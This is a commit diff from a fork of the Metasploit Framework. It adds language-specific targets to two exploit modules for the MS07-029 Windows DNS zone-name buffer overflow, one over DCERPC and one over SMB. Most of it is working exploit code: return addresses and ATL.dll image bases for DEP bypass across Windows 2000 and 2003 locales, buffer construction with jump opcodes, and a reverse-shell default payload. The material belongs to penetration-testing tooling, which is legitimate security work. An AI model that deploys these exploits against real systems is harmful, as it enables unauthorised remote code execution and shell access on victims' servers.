dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Land #15918, add more targets for ms07_029_msdns_zonename

This commit is contained in:
Tim W 2021-11-30 08:24:03 +00:00
parent cd936c92f8 28bc460bac
commit abb11cf896
No known key found for this signature in database
GPG Key ID: 217FBA50ABBAABEF
2 changed files with 48 additions and 26 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

38
modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb
View File

@ -21,7 +21,8 @@ class MetasploitModule < Msf::Exploit::Remote
'Author' =>
[
'hdm', # initial module
'Unknown' # 2 unknown contributors (2003 support)
'Unknown', # 2 unknown contributors (2003 support)
'bcoles' # additional target offsets
],
'License' => MSF_LICENSE,
'References' =>
@ -33,7 +34,8 @@ class MetasploitModule < Msf::Exploit::Remote
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
'EXITFUNC' => 'thread',
'PAYLOAD' => 'windows/shell/reverse_tcp'
},
'Payload' =>
{
@ -48,12 +50,22 @@ class MetasploitModule < Msf::Exploit::Remote
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)', { } ],
[ 'Automatic (2000 SP0-SP4, 2003 SP0-SP2)', { } ],
# WS2HELP.DLL
# p/p/r WS2HELP.DLL
[ 'Windows 2000 Server SP0-SP4+ English', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x75022ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Italian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ French', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ German', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74f92ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Italian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Polish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fb2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Portuguese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Korean', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74f92ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Russian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fb2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Simplified Chinese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Spanish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Swedish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Traditional Chinese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Turkish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fc2ac4 } ],
# Use the __except_handler3 method (and jmp esp in ATL.dll)
[ 'Windows 2003 Server SP0 English', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f45a34, 0x77f7e7f0, 0x76a935bf] } ],
@ -65,7 +77,8 @@ class MetasploitModule < Msf::Exploit::Remote
[ 'Windows 2003 Server SP1-SP2 Spanish', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
[ 'Windows 2003 Server SP1-SP2 Italian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
[ 'Windows 2003 Server SP1-SP2 German', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
[ 'Windows 2003 Server SP1-SP2 Russian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x769a0000 } ],
[ 'Windows 2003 Server SP1-SP2 Simplified Chinese', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x769c0000 } ],
],
'DisclosureDate' => '2007-04-12',
'DefaultTarget' => 0 ))
@ -138,8 +151,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
if (not mytarget)
print_error("There is no available target for this locale")
return
fail_with(Failure::NoTarget, "There is no available target for '#{datastore['LOCALE']}' locale")
end
else
mytarget = target
@ -149,7 +161,7 @@ class MetasploitModule < Msf::Exploit::Remote
# Connect to the high RPC port
connect(true, { 'RPORT' => dport })
print_status("Trying target #{target.name}...")
print_status("Trying target #{mytarget.name}...")
# Bind to the service
handle = dcerpc_handle('50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_ip_tcp', [datastore['RPORT']])
@ -160,18 +172,18 @@ class MetasploitModule < Msf::Exploit::Remote
# Create our buffer with our shellcode first
txt = Rex::Text.rand_text_alphanumeric(8192)
if (target['OS'] =~ /2000/)
if (mytarget['OS'] =~ /2000/)
txt[0, payload.encoded.length] = payload.encoded
off = target['Off']
off = mytarget['Off']
txt[ off ] = [mytarget.ret].pack('V')
txt[ off - 4, 2] = "\xeb\x06"
txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')
elsif (target['OS'] =~ /2003SP0/)
elsif (mytarget['OS'] =~ /2003SP0/)
txt[0, payload.encoded.length] = payload.encoded
off = target['Off']
off = mytarget['Off']
txt[ off ] = [mytarget['Rets'][0]].pack('V') # __except_handler3
txt[ off - 4, 2] = "\xeb\x16"

32
modules/exploits/windows/smb/ms07_029_msdns_zonename.rb
View File

@ -25,7 +25,8 @@ class MetasploitModule < Msf::Exploit::Remote
'Author' =>
[
'hdm', # initial module
'Unknown' # 2 unknown contributors (2003 support)
'Unknown', # 2 unknown contributors (2003 support)
'bcoles' # additional target offsets
],
'License' => MSF_LICENSE,
'References' =>
@ -37,7 +38,8 @@ class MetasploitModule < Msf::Exploit::Remote
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
'EXITFUNC' => 'thread',
'PAYLOAD' => 'windows/shell/reverse_tcp'
},
'Payload' =>
{
@ -52,25 +54,35 @@ class MetasploitModule < Msf::Exploit::Remote
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)', { } ],
[ 'Automatic (2000 SP0-SP4, 2003 SP0-SP2)', { } ],
# WS2HELP.DLL
# p/p/r WS2HELP.DLL
[ 'Windows 2000 Server SP0-SP4+ English', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x75022ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Italian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ French', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ German', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74f92ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Italian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Polish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fb2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Portuguese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Korean', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74f92ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Russian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fb2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Simplified Chinese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Spanish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Swedish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Traditional Chinese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Turkish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fc2ac4 } ],
# Use the __except_handler3 method (and jmp esp in ATL.dll)
[ 'Windows 2003 Server SP0 English', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f45a34, 0x77f7e7f0, 0x76a935bf] } ],
[ 'Windows 2003 Server SP0 French', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f35a34, 0x77f6e7f0, 0x76a435bf] } ],
# ATL.DLL (bypass DEP/NX, IB -> Image Base of ATL.dll)
[ 'Windows 2003 Server SP1-SP2 English', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a80000 } ],
[ 'Windows 2003 Server SP1-SP2 French', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
[ 'Windows 2003 Server SP1-SP2 Spanish', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
[ 'Windows 2003 Server SP1-SP2 Italian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
[ 'Windows 2003 Server SP1-SP2 German', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
[ 'Windows 2003 Server SP1-SP2 Russian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x769a0000 } ],
[ 'Windows 2003 Server SP1-SP2 Simplified Chinese', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x769c0000 } ],
],
'DisclosureDate' => '2007-04-12',
'DefaultTarget' => 0 ))
@ -124,14 +136,12 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("Detected a Windows 2003 SP#{$2} target...")
target = gettarget('2003SP12')
else
print_status("Unknown OS: #{smb_peer_os}")
return
fail_with(Failure::NoTarget, "No target for OS: #{smb_peer_os}")
end
end
if (not target)
print_status("There is no available target for this OS locale")
return
fail_with(Failure::NoTarget, "There is no available target for '#{datastore['LOCALE']}' locale")
end
print_status("Trying target #{target.name}...")